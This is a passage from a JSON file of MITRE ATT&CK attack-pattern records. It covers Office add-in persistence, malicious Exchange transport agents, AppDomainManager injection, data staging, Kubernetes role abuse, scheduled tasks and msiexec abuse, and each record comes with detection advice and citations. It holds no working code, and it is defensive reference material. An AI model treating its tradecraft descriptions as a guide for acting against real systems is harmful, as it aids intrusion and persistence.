"name": "Add-ins", + "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)\n\nAdd-ins can be used to obtain persistence because they can be set to execute code when an Office application starts. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Office 365" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d", + "created": "2019-11-07T19:52:52.801Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1137/006", + "external_id": "T1137.006" + }, + { + "source_name": "Microsoft Office Add-ins", + "description": "Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.", + "url": "https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460" + }, + { + "source_name": "MRWLabs Office Persistence Add-ins", + "description": "Knowles, W. (2017, April 21). Add-In Opportunities for Office Persistence. Retrieved July 3, 2017.", + "url": "https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/" + }, + { + "source_name": "FireEye Mail CDS 2018", + "description": "Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail! Enterprise Email Compromise. Retrieved April 22, 2019.", + "url": "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf" + }, + { + "source_name": "GlobalDotName Jun 2019", + "description": "Shukrun, S. (2019, June 2). Office Templates and GlobalDotName - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.", + "url": "https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Transport Agent", + "description": "Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks. \n\nAdversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "ESET", + "Christoffer Strömblad" + ], + "x_mitre_detection": "Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "SYSTEM", + "Administrator", + "root" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", + "created": "2019-12-12T15:08:20.972Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1505/002", + "external_id": "T1505.002" + }, + { + "source_name": "Microsoft TransportAgent Jun 2016", + "description": "Microsoft. (2016, June 1). Transport agents. Retrieved June 24, 2019.", + "url": "https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help" + }, + { + "source_name": "ESET LightNeuron May 2019", + "description": "Faou, M. (2019, May). Turla LightNeuron: One email away from remote code execution. Retrieved June 24, 2019.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:03.395Z", + "name": "Transient Cyber Asset", + "description": "Adversaries may target devices that are transient across ICS networks and external networks. Normally, transient assets are brought into an environment by authorized personnel and do not remain in that environment on a permanent basis. (Citation: North American Electric Reliability Corporation June 2021) Transient assets are commonly needed to support management functions and may be more common in systems where a remotely managed asset is not feasible, external connections for remote access do not exist, or 3rd party contractor/vendor access is required. \n\nAdversaries may take advantage of transient assets in different ways. For instance, adversaries may target a transient asset when it is connected to an external network and then leverage its trusted access in another environment to launch an attack. They may also take advantage of installed applications and libraries that are used by legitimate end-users to interact with control system devices. \n\nTransient assets, in some cases, may not be deployed with a secure configuration leading to weaknesses that could allow an adversary to propagate malicious executable code, e.g., the transient asset may be infected by malware and when connected to an ICS environment the malware propagates onto other systems. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9", + "created": "2021-10-14T15:25:32.143Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0864", + "external_id": "T0864" + }, + { + "source_name": "North American Electric Reliability Corporation June 2021", + "description": "North American Electric Reliability Corporation 2021, June 28 Glossary of Terms Used in NERC Reliability Standards Retrieved. 2021/10/11 ", + "url": "https://www.nerc.com/pa/Stand/Glossary%20of%20Terms/Glossary_of_Terms.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "System Information Discovery", + "description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nTools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. show version).(Citation: US-CERT-TA18-106A) [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)\n\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Maril Vernon @shewhohacks", + "Praetorian", + "Austin Clark, @c2defense" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to gather detailed system information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nIn cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "IaaS", + "Linux", + "macOS", + "Network" + ], + "x_mitre_version": "2.5", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "created": "2017-05-31T21:31:04.307Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1082", + "external_id": "T1082" + }, + { + "source_name": "Amazon Describe Instance", + "description": "Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020.", + "url": "https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html" + }, + { + "source_name": "Google Instances Resource", + "description": "Google. (n.d.). Rest Resource: instance. Retrieved March 3, 2020.", + "url": "https://cloud.google.com/compute/docs/reference/rest/v1/instances" + }, + { + "source_name": "Microsoft Virutal Machine API", + "description": "Microsoft. (2019, March 1). Virtual Machines - Get. Retrieved October 8, 2019.", + "url": "https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get" + }, + { + "source_name": "20 macOS Common Tools and Techniques", + "description": "Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.", + "url": "https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/" + }, + { + "source_name": "OSX.FairyTale", + "description": "Phile Stokes. (2018, September 20). On the Trail of OSX.FairyTale | Adware Playing at Malware. Retrieved August 24, 2021.", + "url": "https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/" + }, + { + "source_name": "US-CERT-TA18-106A", + "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-01-17T22:52:23.454Z", + "name": "Application Layer Protocol", + "description": "Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye Spy Email Nov 22) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Duane Michael" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "2.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", + "created": "2017-05-31T21:30:56.776Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1071", + "external_id": "T1071" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + }, + { + "source_name": "Mandiant APT29 Eye Spy Email Nov 22", + "description": "Mandiant. (2022, May 2). UNC3524: Eye Spy on Your Email. Retrieved August 17, 2023.", + "url": "https://www.mandiant.com/resources/blog/unc3524-eye-spy-email" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-28T15:44:25.342Z", + "name": "AppDomainManager", + "description": "Adversaries may execute their own malicious payloads by hijacking how the .NET `AppDomainManager` loads assemblies. The .NET framework uses the `AppDomainManager` class to create and manage one or more isolated runtime environments (called application domains) inside a process to host the execution of .NET applications. Assemblies (`.exe` or `.dll` binaries compiled to run as .NET code) may be loaded into an application domain as executable code.(Citation: Microsoft App Domains) \n\nKnown as \"AppDomainManager injection,\" adversaries may execute arbitrary code by hijacking how .NET applications load assemblies. For example, malware may create a custom application domain inside a target process to load and execute an arbitrary assembly. Alternatively, configuration files (`.config`) or process environment variables that define .NET runtime settings may be tampered with to instruct otherwise benign .NET applications to load a malicious assembly (identified by name) into the target process.(Citation: PenTestLabs AppDomainManagerInject)(Citation: PwC Yellow Liderc)(Citation: Rapid7 AppDomain Manager Injection)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Thomas B", + "Ivy Drexel" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--356662f7-e315-4759-86c9-6214e2a50ff8", + "created": "2024-03-28T15:36:34.141Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1574/014", + "external_id": "T1574.014" + }, + { + "source_name": "PenTestLabs AppDomainManagerInject", + "description": "Administrator. (2020, May 26). APPDOMAINMANAGER INJECTION AND DETECTION. Retrieved March 28, 2024.", + "url": "https://pentestlaboratories.com/2020/05/26/appdomainmanager-injection-and-detection/" + }, + { + "source_name": "Microsoft App Domains", + "description": "Microsoft. (2021, September 15). Application domains. Retrieved March 28, 2024.", + "url": "https://learn.microsoft.com/dotnet/framework/app-domains/application-domains" + }, + { + "source_name": "PwC Yellow Liderc", + "description": "PwC Threat Intelligence. (2023, October 25). Yellow Liderc ships its scripts and delivers IMAPLoader malware. Retrieved March 29, 2024.", + "url": "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html" + }, + { + "source_name": "Rapid7 AppDomain Manager Injection", + "description": "Spagnola, N. (2023, May 5). AppDomain Manager Injection: New Techniques For Red Teams. Retrieved March 29, 2024.", + "url": "https://www.rapid7.com/blog/post/2023/05/05/appdomain-manager-injection-new-techniques-for-red-teams/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Remote Data Staging", + "description": "Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.\n\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)\n\nBy staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Praetorian" + ], + "x_mitre_detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "IaaS", + "Linux", + "macOS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0", + "created": "2020-03-13T21:14:58.206Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1074/002", + "external_id": "T1074.002" + }, + { + "source_name": "Mandiant M-Trends 2020", + "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.", + "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-16T17:51:35.865Z", + "name": "Additional Container Cluster Roles", + "description": "An adversary may add additional roles or permissions to an adversary-controlled user or service account to maintain persistent access to a container orchestration system. For example, an adversary with sufficient permissions may create a RoleBinding or a ClusterRoleBinding to bind a Role or ClusterRole to a Kubernetes account.(Citation: Kubernetes RBAC)(Citation: Aquasec Kubernetes Attack 2023) Where attribute-based access control (ABAC) is in use, an adversary with sufficient permissions may modify a Kubernetes ABAC policy to give the target account additional permissions.(Citation: Kuberentes ABAC)\n \nThis account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. \n\nNote that where container orchestration systems are deployed in cloud environments, as with Google Kubernetes Engine, Amazon Elastic Kubernetes Service, and Azure Kubernetes Service, cloud-based role-based access control (RBAC) assignments or ABAC policies can often be used in place of or in addition to local permission assignments.(Citation: Google Cloud Kubernetes IAM)(Citation: AWS EKS IAM Roles for Service Accounts)(Citation: Microsoft Azure Kubernetes Service Service Accounts) In these cases, this technique may be used in conjunction with [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Containers" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--35d30338-5bfa-41b0-a170-ec06dfd75f64", + "created": "2023-07-14T14:01:50.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1098/006", + "external_id": "T1098.006" + }, + { + "source_name": "AWS EKS IAM Roles for Service Accounts", + "description": "Amazon Web Services. (n.d.). IAM roles for service accounts. Retrieved July 14, 2023.", + "url": "https://docs.aws.amazon.com/eks/latest/userguide/iam-roles-for-service-accounts.html" + }, + { + "source_name": "Google Cloud Kubernetes IAM", + "description": "Google Cloud. (n.d.). Create IAM policies. Retrieved July 14, 2023.", + "url": "https://cloud.google.com/kubernetes-engine/docs/how-to/iam" + }, + { + "source_name": "Kuberentes ABAC", + "description": "Kuberenets. (n.d.). Using ABAC Authorization. Retrieved July 14, 2023.", + "url": "https://kubernetes.io/docs/reference/access-authn-authz/abac/" + }, + { + "source_name": "Kubernetes RBAC", + "description": "Kubernetes. (n.d.). Role Based Access Control Good Practices. Retrieved March 8, 2023.", + "url": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/" + }, + { + "source_name": "Aquasec Kubernetes Attack 2023", + "description": "Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14, 2023.", + "url": "https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters" + }, + { + "source_name": "Microsoft Azure Kubernetes Service Service Accounts", + "description": "Microsoft Azure. (2023, April 28). Access and identity options for Azure Kubernetes Service (AKS). Retrieved July 14, 2023.", + "url": "https://learn.microsoft.com/en-us/azure/aks/concepts-identity" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-01T15:29:46.832Z", + "name": "Scheduled Task/Job", + "description": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\n\nAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.(Citation: ProofPoint Serpent)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Prashant Verma, Paladion", + "Leo Loobeek, @leoloobeek", + "Travis Smith, Tripwire", + "Alain Homewood, Insomnia Security", + "Andrew Northern, @ex_raritas", + "Bryan Campbell, @bry_campbell", + "Zachary Abzug, @ZackDoesML", + "Selena Larson, @selenalarson" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "x_mitre_version": "2.3", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "SYSTEM", + "Administrator", + "User" + ], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM", + "User" + ], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "created": "2017-05-31T21:30:46.977Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1053", + "external_id": "T1053" + }, + { + "source_name": "ProofPoint Serpent", + "description": "Campbell, B. et al. (2022, March 21). Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain. Retrieved April 11, 2022.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain" + }, + { + "source_name": "TechNet Task Scheduler Security", + "description": "Microsoft. (2005, January 21). Task Scheduler and security. Retrieved June 8, 2016.", + "url": "https://technet.microsoft.com/en-us/library/cc785125.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Msiexec", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.\n\nAdversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Ziv Kaspersky, Cymptom", + "Alexandros Pappas" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of msiexec.exe. Compare recent invocations of msiexec.exe with prior history of known good arguments and executed MSI files or DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of msiexec.exe may also be useful in determining the origin and purpose of the MSI files or DLLs being executed.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Digital Certificate Validation", + "Application control" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336", + "created": "2020-01-24T14:38:49.266Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218/007", + "external_id": "T1218.007" + }, + { + "source_name": "TrendMicro Msiexec Feb 2018", + "description": "Co, M. and Sison, G. (2018, February 8). Attack Using Windows Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/" + }, + { + "source_name": 